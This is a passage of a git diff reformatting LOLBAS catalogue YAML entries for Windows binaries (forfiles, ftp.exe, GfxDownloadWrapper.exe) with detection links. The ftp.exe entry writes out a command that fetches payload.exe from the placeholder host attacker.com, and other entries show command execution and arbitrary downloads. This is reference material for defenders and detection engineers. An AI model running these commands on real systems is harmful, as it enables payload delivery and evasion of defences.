C:\Windows\SysWOW64\forfiles.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml +- Splunk: https://research.splunk.com/endpoint/1fdf31c9-ff4d-4c48-b799-0e8666e08787/ Resources: - - Link: https://twitter.com/vector_sec/status/896049052642533376 - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://twitter.com/vector_sec/status/896049052642533376 +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Eric - Handle: '@vector_sec' - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Eric + Handle: '@vector_sec' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e2f..5c56da5cd 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -1,41 +1,42 @@ ---- Name: Ftp.exe Description: A binary designed for connecting to FTP servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-12-10 Commands: - - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt - Description: Executes the commands you put inside the text file. - Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" - Description: Download - Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt + Description: Executes the commands you put inside the text file. + Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo + PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo + quit>>ftp.txt&@ftp -s:ftp.txt -v" + Description: Download + Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows + 10 Full_Path: - - Path: C:\Windows\System32\ftp.exe - - Path: C:\Windows\SysWOW64\ftp.exe +- Path: C:\Windows\System32\ftp.exe +- Path: C:\Windows\SysWOW64\ftp.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml - - IOC: cmd /c as child process of ftp.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml +- IOC: cmd /c as child process of ftp.exe Resources: - - Link: https://twitter.com/0xAmit/status/1070063130636640256 - - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 - - Link: https://ss64.com/nt/ftp.html - - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ +- Link: https://twitter.com/0xAmit/status/1070063130636640256 +- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 +- Link: https://ss64.com/nt/ftp.html +- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' - - Person: BennyHusted - Handle: '' - - Person: Amit Serper - Handle: '@0xAmit ' ---- +- Person: Casey Smith + Handle: '@subtee' +- Person: BennyHusted + Handle: '' +- Person: Amit Serper + Handle: '@0xAmit ' diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index bd3ec8f7c..84922c782 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -1,179 +1,182 @@ ---- Name: GfxDownloadWrapper.exe -Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. +Description: Remote file download used by the Intel Graphics Control Panel, receives + as first parameter a URL and a destination file path. Author: Jesus Galvez Created: 2019-12-27 Commands: - - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" - Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". - Usecase: Download file from internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10 +- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe + "URL" "DESTINATION FILE" + Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes + it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows + Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component + CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: Download file from internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10 Full_Path: - - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ - - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ - - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ - - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ - - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ - - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ - - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ - - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ - - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ - - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ - - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ - - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ - - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ - - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ - - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ - - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ - - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ - - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ - - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ - - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ - - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ - - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ - - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ - - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ - - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ - - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ - - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ - - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ - - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ - - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ - - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ - - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ - - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ - - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ - - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ - - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ - - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ - - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ - - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ - - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ - - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ - - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ - - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ - - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ - - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ - - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ - - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ +- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ +- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ +- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ +- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ +- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ +- Path: 